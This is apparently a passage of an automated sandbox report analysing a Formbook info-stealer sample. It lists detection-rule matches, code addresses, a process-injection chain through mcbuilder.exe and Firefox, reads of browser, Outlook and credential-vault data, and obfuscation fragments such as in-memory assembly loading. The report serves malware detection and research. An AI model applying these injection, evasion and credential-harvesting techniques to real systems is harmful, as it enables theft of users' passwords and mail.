                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03941AA38_2_03941AA3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0393DAAC8_2_0393DAAC
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0394DAC68_2_0394DAC6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03957A468_2_03957A46
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FA498_2_0395FA49
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03913A6C8_2_03913A6C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_039359108_2_03935910
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A99508_2_038A9950
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BB9508_2_038BB950
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A38E08_2_038A38E0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0390D8008_2_0390D800
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A1F928_2_038A1F92
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FFB18_2_0395FFB1
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03863FD58_2_03863FD5
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03863FD28_2_03863FD2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FF098_2_0395FF09
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A9EB08_2_038A9EB0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038BFDC08_2_038BFDC0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038A3D408_2_038A3D40
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03951D5A8_2_03951D5A
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03957D738_2_03957D73
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0395FCF28_2_0395FCF2
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03919C328_2_03919C32
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A1B708_2_030A1B70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CA688_2_0309CA68
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CA708_2_0309CA70
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309AD108_2_0309AD10
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309CC908_2_0309CC90
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030BB2C08_2_030BB2C0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A37EB8_2_030A37EB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A37F08_2_030A37F0
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE3548_2_03BBE354
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE4738_2_03BBE473
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBE80C8_2_03BBE80C
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03BBD8788_2_03BBD878
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Code function: String function: 018FB970 appears 262 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Code function: String function: 01945130 appears 58 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Code function: String function: 0198F290 appears 103 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Code function: String function: 0197EA12 appears 86 times
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Code function: String function: 01957E54 appears 107 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Code function: String function: 0390EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Code function: String function: 0391F290 appears 103 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Code function: String function: 038D5130 appears 58 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Code function: String function: 0388B970 appears 262 times
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Code function: String function: 038E7E54 appears 107 times
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1758679977.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000000.1637708265.0000000000912000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754233413.000000000107E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000019FD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, Binary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: dGHiTqj3AB.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs, Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs, Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs, Security API names: _0020.SetAccessControl
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs, Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754175438.0000000001037000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: ational Typeface Corporation.slntQ
                  Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@9/2@7/5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dGHiTqj3AB.exe.log
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Mutant created: NULL
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File created: C:\Users\user\AppData\Local\Temp\6fI63K3E
                  Source: dGHiTqj3AB.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Program Files\Mozilla Firefox\firefox.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: mcbuilder.exe, 00000008.00000003.2583851167.00000000033B6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE sync_entities_metadata (storage_key INTEGER PRIMARY KEY AUTOINCREMENT, metadata VARCPi;
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2583851167.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2595096296.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknown, Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Process created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe, Process created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: dGHiTqj3AB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: dGHiTqj3AB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: dGHiTqj3AB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mcbuilder.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: amWV.pdb source: dGHiTqj3AB.exe
                  Source: Binary string: amWV.pdbSHA256 source: dGHiTqj3AB.exe
                  Source: Binary string: mcbuilder.pdb source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fgebfePlJm.exe, 00000007.00000000.2188191018.000000000092E000.00000002.00000001.01000000.0000000C.sdmp, fgebfePlJm.exe, 00000009.00000000.2469561771.000000000092E000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: dGHiTqj3AB.exe, dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: dGHiTqj3AB.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                  Source: 8.2.mcbuilder.exe.3f2cd10.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.2.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.0.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 11.2.firefox.exe.a7bcd10.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0102F112 pushad ; iretd 0_2_0102F119
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_01025DF7 push eax; iretd 0_2_01025E21
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418BBD push ds; retf 2ECDh3_2_00418BEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00401420 push es; retn 00F1h3_2_004014F8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041F0DC push es; retf 3_2_0041F0E6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00412104 pushad ; ret 3_2_0041212D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040C1EA push edx; retf 3_2_0040C1EE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00403260 push eax; ret 3_2_00403262
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00426263 push edi; iretd 3_2_0042626E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00408271 push es; ret 3_2_00408272
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00413A0B push esi; retf 3_2_00413A0E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418A13 push ds; retf 2ECDh3_2_00418BEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418355 push ebp; retf 3_2_004183DC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418BA5 push ebx; iretd 3_2_00418BA6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041E653 push ds; iretd 3_2_0041E654
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041E63B push ebx; iretd 3_2_0041E64C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D225F pushad ; ret 3_2_018D27F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D27FA pushad ; ret 3_2_018D27F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD push ecx; mov dword ptr [esp], ecx3_2_019009B6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D283D push eax; iretd 3_2_018D2858
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0386225F pushad ; ret 8_2_038627F9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038627FA pushad ; ret 8_2_038627F9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038909AD push ecx; mov dword ptr [esp], ecx8_2_038909B6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0386283D push eax; iretd 8_2_03862858
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03861368 push eax; iretd 8_2_03861369
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B0280 push edi; retn F913h8_2_030B03A3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A07A8 push esi; retf 8_2_030A07AB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03098F87 push edx; retf 8_2_03098F8B
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309EEA1 pushad ; ret 8_2_0309EECA
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A730F push esp; iretd 8_2_030A7319
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AB3D8 push ebx; iretd 8_2_030AB3E9
